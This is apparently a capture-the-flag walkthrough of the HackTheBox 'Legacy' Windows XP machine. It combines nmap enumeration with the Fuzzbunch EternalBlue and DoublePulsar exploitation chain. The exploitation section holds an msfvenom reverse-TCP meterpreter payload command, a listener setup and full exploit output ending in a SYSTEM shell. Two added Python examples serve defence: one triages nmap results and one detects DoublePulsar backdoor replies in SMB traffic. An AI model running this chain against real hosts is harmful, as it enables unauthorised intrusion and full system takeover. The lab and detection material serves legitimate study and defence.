Enumeration
Port scanning
> sudo nmap -A 10.10.10.4
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
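An added example that is not part of the original writeup: a small Python triage script that parses nmap output like the report above (a constructed copy of that scan is embedded inline) and derives the three indicators a defender would want flagged from it: SMB reachable on tcp/139 or tcp/445, an end-of-life operating system according to the reported CPE, and SMB message signing disabled. The regexes, the `ScanFacts` structure and the `EOL_CPES` list are this example's own assumptions, not part of nmap.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the nmap -A output shown above, trimmed to the parts the
# parser consumes (port table and smb-* host script results).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
"""

# One port-table row: "445/tcp open microsoft-ds Windows XP microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
# One NSE script output line: "| OS CPE: cpe:/o:microsoft:windows_xp::-"
KV_RE = re.compile(r"^\|_?\s*([^:]+):\s*(.*)$")

# Microsoft OS CPE prefixes that no longer receive vendor patches (assumption
# of this example; extend as needed).
EOL_CPES = (
    "cpe:/o:microsoft:windows_2000",
    "cpe:/o:microsoft:windows_xp",
    "cpe:/o:microsoft:windows_server_2003",
)


@dataclass
class ScanFacts:
    host: str = ""
    open_ports: dict = field(default_factory=dict)  # port -> service name
    smb: dict = field(default_factory=dict)         # lower-cased key -> value


def parse_scan(text):
    """Extract host, open ports and smb-* script key/value pairs from nmap text."""
    facts = ScanFacts()
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Nmap scan report for "):
            facts.host = line.split(" for ", 1)[1]
            continue
        m = PORT_RE.match(line)
        if m:
            port, state, service = int(m.group(1)), m.group(3), m.group(4)
            if state == "open":
                facts.open_ports[port] = service
            continue
        m = KV_RE.match(line)
        if m:
            facts.smb[m.group(1).strip().lower()] = m.group(2).strip()
    return facts


def assess(facts):
    """Turn parsed facts into findings a defender would act on."""
    findings = []
    smb_ports = sorted(p for p in (139, 445) if p in facts.open_ports)
    if smb_ports:
        findings.append("smb_exposed: " + ", ".join(f"tcp/{p}" for p in smb_ports))
    cpe = facts.smb.get("os cpe", "")
    if any(cpe.startswith(eol) for eol in EOL_CPES):
        findings.append(f"end_of_life_os: {cpe} ({facts.smb.get('os', 'unknown')})")
    signing = facts.smb.get("message_signing", "")
    if signing.startswith("disabled"):
        findings.append("smb_signing_disabled: " + signing)
    return findings


if __name__ == "__main__":
    for finding in assess(parse_scan(SAMPLE_SCAN)):
        print(finding)
```

The three findings together describe exactly the exposure the rest of this walkthrough exploits: SMBv1 reachable on a host that cannot be patched, with signing off. In a real assessment the same function can be run over `nmap -oN` output for a whole subnet.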
Exploitation
Installing Fuzzbunch on Linux
- Install wine and winetricks using the package manager of your Linux distro.
- Initialise a 32-bit wine prefix (you may need to install your distro's 32-bit packages):
> WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot
- Install python26 via winetricks:
> WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
- Clone the Fuzzbunch files from git:
> cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
- I have written a little script to run Fuzzbunch:
> sudo nano /usr/local/bin/fuzzbunch
#!/bin/sh
# Launcher for Fuzzbunch under the 32-bit wine prefix created above
export WINEPREFIX="$HOME/.wine-fuzzbunch"
cd "$HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows" || exit 1
wine ../../Python26/python.exe fb.py
> sudo chmod +x /usr/local/bin/fuzzbunch
Making the shellcode payload
We need a DLL payload for DoublePulsar to inject. You can build it with msfvenom or any other tool you like:
> cd $HOME/.wine-fuzzbunch/drive_c/
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[INSERT_YOUR_IP_HERE] LPORT=60000 -f dll -o shell.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll
Setting up the listener
Again, use whatever listener you like. Here I use Metasploit's multi/handler:
> msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST INSERT_YOUR_IP_HERE
msf exploit(handler) > set LPORT 60000
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_HERE:60000
Running fuzzbunch
> fuzzbunch
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON
[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : [INSERT_YOUR_IP_HERE]
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\fuzzbunch-debian\logs] :
[*] Checking C:\fuzzbunch-debian\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to 'C:\fuzzbunch-debian\logs\legacy\z10.10.10.4'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => [INSERT_YOUR_IP_HERE]
[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy
Running EternalBlue
fb > use EternalBlue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
[?] Prompt For Variable Settings? [Yes] : y
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
*-> 0) XP Windows XP 32-Bit All Service Packs
1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 0
[+] Set Target => XP
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
0) DANE Forward deployment via DARINGNEOPHYTE
*-> 1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : y
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445
[+] Configure Plugin Remote Tunnels
These are our final settings for EternalBlue:
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP
Now let’s execute it:
[?] Execute Plugin? [Yes] : y
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 00 Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
[+] Allocation total: 0xfff4
[+] Spray size: 0
[+] Allocation total: 0x1ffe8
[+] Spray size: 1
[+] Allocation total: 0x2ffdc
[+] Spray size: 2
[+] Allocation total: 0x3ffd0
[+] Spray size: 3
[+] Allocation total: 0x4ffc4
[+] Spray size: 4
[+] Allocation total: 0x5ffb8
[+] Spray size: 5
[+] Allocation total: 0x6ffac
[+] Spray size: 6
[+] Allocation total: 0x7ffa0
[+] Spray size: 7
[+] Allocation total: 0x8ff94
[+] Spray size: 8
[+] Allocation total: 0x9ff88
[+] Spray size: 9
[+] Allocation total: 0xaff7c
[+] Spray size: 10
[+] Allocation total: 0xbff70
[+] Spray size: 11
[+] Quota NOT exceeded after 12 packets
[+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending 2 non-paged pool fragment packets
....DONE.
[+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
[+] Sending 10 non-paged pool grooming packets
..........DONE.
[+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
Running DoublePulsar
fb Special (Eternalblue) > use DoublePulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*-> 0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*-> 0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] :
[*] Function :: Operation for backdoor to perform
0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
*-> 2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] :
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] : svchost.exe
[+] Set ProcessName => svchost.exe
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445
[+] Configure Plugin Remote Tunnels
These are our final settings for DoublePulsar:
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
DllPayload C:\shell.dll
DllOrdinal 1
ProcessName svchost.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL
Make sure to change ProcessName from the default lsass.exe to svchost.exe!
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x00811F87
SMB Connection string is: Windows 5.1
Target OS is: XP x86
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
Back in Metasploit, the handler receives the callback:
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM :D
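The DoublePulsar stage above leaves a kernel-mode backdoor listening on tcp/445 that answers a specially-formed SMB Trans2 request with a recognisable Multiplex ID (the published indicator used by nmap's smb-double-pulsar-backdoor script and similar scanners: the reply carries MID 0x51 where a clean server echoes the request's 0x41). As an added example that is not part of the original writeup, the Python below implements that check passively over captured SMB1 messages so a defender can find already-backdoored hosts in traffic. It parses the NetBIOS and SMB1 headers itself; the `(src, dst, payload)` capture format, the header-only fixture builders and the sample capture are constructed for this example and are not real traffic.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
SMB_FLAGS_REPLY = 0x80          # bit 7 of Flags: message is a server reply
PING_REQUEST_MID = 0x41         # MID used by the published DoublePulsar "ping"
DOUBLEPULSAR_MID = 0x51         # backdoored host answers with 0x41 + 0x10;
                                # an unmodified SMB server echoes 0x41 back


def parse_smb1(data):
    """Parse a NetBIOS session message carrying an SMB1 header.

    Returns a dict of header fields, or None when the bytes are not SMB1.
    Layout: 4-byte NetBIOS header, then the 32-byte SMB header (magic,
    command, status, flags, flags2, pid_high, signature, reserved, tid,
    pid, uid, mid)."""
    if len(data) < 36 or data[0] != 0x00:
        return None
    nb_len = int.from_bytes(data[1:4], "big")
    hdr = data[4:36]
    if nb_len < 32 or hdr[:4] != SMB_MAGIC:
        return None
    status, flags, flags2 = struct.unpack_from("<IBH", hdr, 5)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"command": hdr[4], "status": status, "flags": flags,
            "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def is_doublepulsar_reply(data):
    """Stateless indicator: a Trans2 reply whose MID is 0x51."""
    smb = parse_smb1(data)
    return (smb is not None
            and smb["command"] == SMB_COM_TRANSACTION2
            and bool(smb["flags"] & SMB_FLAGS_REPLY)
            and smb["mid"] == DOUBLEPULSAR_MID)


def find_backdoored_hosts(messages):
    """Stateful check over (src, dst, payload) tuples in capture order.

    A server is flagged only when its 0x51 reply answers a Trans2 request
    that used MID 0x41 on the same flow. This removes the false positive of
    a legitimate client that merely happens to use MID 0x51 itself."""
    pending = set()   # (client, server) flows with an outstanding 0x41 Trans2
    hosts = []
    for src, dst, payload in messages:
        smb = parse_smb1(payload)
        if smb is None or smb["command"] != SMB_COM_TRANSACTION2:
            continue
        if not smb["flags"] & SMB_FLAGS_REPLY:
            if smb["mid"] == PING_REQUEST_MID:
                pending.add((src, dst))            # client -> server
        else:
            flow = (dst, src)                      # reply travels server -> client
            if flow in pending and smb["mid"] == DOUBLEPULSAR_MID and src not in hosts:
                hosts.append(src)
            pending.discard(flow)
    return hosts


# --- constructed fixtures: header-only SMB1 messages, not real traffic ---

def _smb1_message(command, flags, mid, status=0):
    hdr = (SMB_MAGIC + bytes([command])
           + struct.pack("<IBH", status, flags, 0xC807)   # status, flags, flags2
           + b"\x00" * 2 + b"\x00" * 8 + b"\x00" * 2      # pid_high, signature, reserved
           + struct.pack("<HHHH", 0, 0xFEFF, 0, mid))     # tid, pid, uid, mid
    body = b"\x00\x00\x00"                                # WordCount 0, ByteCount 0
    payload = hdr + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def trans2_request(mid):
    return _smb1_message(SMB_COM_TRANSACTION2, 0x18, mid)


def trans2_reply(mid):
    return _smb1_message(SMB_COM_TRANSACTION2, 0x18 | SMB_FLAGS_REPLY, mid)


# Constructed capture: an analyst host probes two servers; only 10.10.10.4
# answers with the backdoor MID. 10.10.10.9 is a client that legitimately
# uses MID 0x51 in its own request, which the stateful check must not flag.
SAMPLE_CAPTURE = [
    ("10.10.14.2", "10.10.10.4", trans2_request(0x41)),
    ("10.10.10.4", "10.10.14.2", trans2_reply(0x51)),
    ("10.10.14.2", "10.10.10.5", trans2_request(0x41)),
    ("10.10.10.5", "10.10.14.2", trans2_reply(0x41)),
    ("10.10.10.9", "10.10.10.5", trans2_request(0x51)),
    ("10.10.10.5", "10.10.10.9", trans2_reply(0x51)),
]

if __name__ == "__main__":
    print("backdoored hosts:", find_backdoored_hosts(SAMPLE_CAPTURE))
```

Run over the sample capture, the stateless check flags two replies (10.10.10.4 and the harmless 0x51 echo from 10.10.10.5), while the flow-correlated check reports only 10.10.10.4. To apply it to real traffic, feed the function TCP payloads of port-445 segments in capture order; the fingerprint is header-only, so no payload decoding beyond the 36-byte prefix is needed.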